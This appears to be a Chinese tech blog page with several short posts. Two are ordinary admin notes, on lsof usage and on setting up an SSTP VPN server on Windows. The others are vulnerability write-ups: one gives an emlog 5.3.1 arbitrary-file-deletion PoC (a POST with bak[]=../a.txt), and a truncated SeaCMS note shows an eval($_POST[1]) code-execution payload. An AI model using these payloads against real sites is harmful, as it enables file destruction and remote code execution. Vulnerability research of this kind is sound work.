lsof归纳

lsof(lsof的全称是list open files),此工具可以用来查看正在运行中的进程打开了哪些文件、目录和套接字;是系统监测工具之一

一般root用户才能执行lsof命令,普通用户可以看见/usr/sbin/lsof命令,但是普通用户执行会显示“permission denied”

我总结一下lsof指令的用法:

lsof abc.txt 显示开启文件abc.txt的进程

lsof -i :22 知道22端口现在运行什么程序

lsof -c abc 显示abc进程现在打开的文件

lsof -g gid 显示归属gid的进程情况

lsof +d /usr/local/ 显示目录下被进程开启的文件

lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长

lsof -d 4 显示使用fd为4的进程

lsof -i 用以显示符合条件的进程情况

语法: lsof -i[46] [protocol][@hostname|hostaddr][:service|port]

46 –> IPv4 or IPv6

protocol –> TCP or UDP

hostname –> Internet host name

hostaddr –> IPv4位置

service –> /etc/service中的 service name (可以不只一个)

port –> 端口号 (可以不只一个)

例子: TCP:25 – TCP and port 25

@1.2.3.4 – Internet IPv4 host address 1.2.3.4

tcp@ohaha.ks.edu.tw:ftp – TCP protocol hosthaha.ks.edu.tw service name:ftp

lsof -n 不将IP转换为hostname,缺省是不加上-n参数

例子: lsof -i tcp@ohaha.ks.edu.tw:ftp -n

lsof -p 12 看进程号为12的进程打开了哪些文件

lsof +|-r [t] 控制lsof不断重复执行,缺省是15s刷新

-r,lsof会永远不断的执行,直到收到中断信号

+r,lsof会一直执行,直到没有档案被显示

例子:不断查看目前ftp连接的情况:lsof -i tcp@ohaha.ks.edu.tw:ftp -r

lsof -s 列出打开文件的大小,如果没有大小,则留下空白

lsof -u username 以UID,列出打开的文件

Windows 搭建SSTP服务器

折腾了2个小时,可算弄好了,现在记录下,担心忘记;

环境:Windows2008 及以上

用到的工具:Internet Information Services (IIS) 6.0 Resource Kit Tools

首先在服务器上安装远程路由访问

然后生成证书:

selfssl.exe /N:cn=证书名称 /V:3650

将生成好的证书安装到本地

在HOSTS文件中增加一行

VPN服务器的IP         证书名称

拨号的地址填写为:证书名称

emlog个人博客系统存在任意文件删除

作者:BRST.末于

地址:http://forum.vul.li/thread-62-1-1.html

今天群里表哥发的一个漏洞链接

本着学习的态度小弟来复现看看
一个很鸡肋的漏洞,需要后台权限
emlog5.3.1 漏洞发生/src/admin/data.php 文件
直接上代码吧

if ($action == ‘dell_all_bak’) {

if (!isset($_POST[‘bak’])) {
emDirect(‘./data.php?error_a=1’);
} else{
foreach ($_POST[‘bak’] as $val) {//可以看到未经过滤就直接删除

unlink($val);
}
emDirect(‘./data.php?active_del=1’);
}
}

POC:

POST

/emlog/admin/data.php?action=dell_all_bak

bak[]=../a.txt

海洋cms v6.33代码执行

作者:BRST.风疏

地址:http://forum.vul.li/thread-57-1-1.html

网上看到v6.28的代码执行,想看看厂商怎么修复的,然后对比了下两个版本代码

v6.28的为

/search.php?searchtype=5&tid=&area=eval($_POST[1])

对比两个版本的 继续阅读 »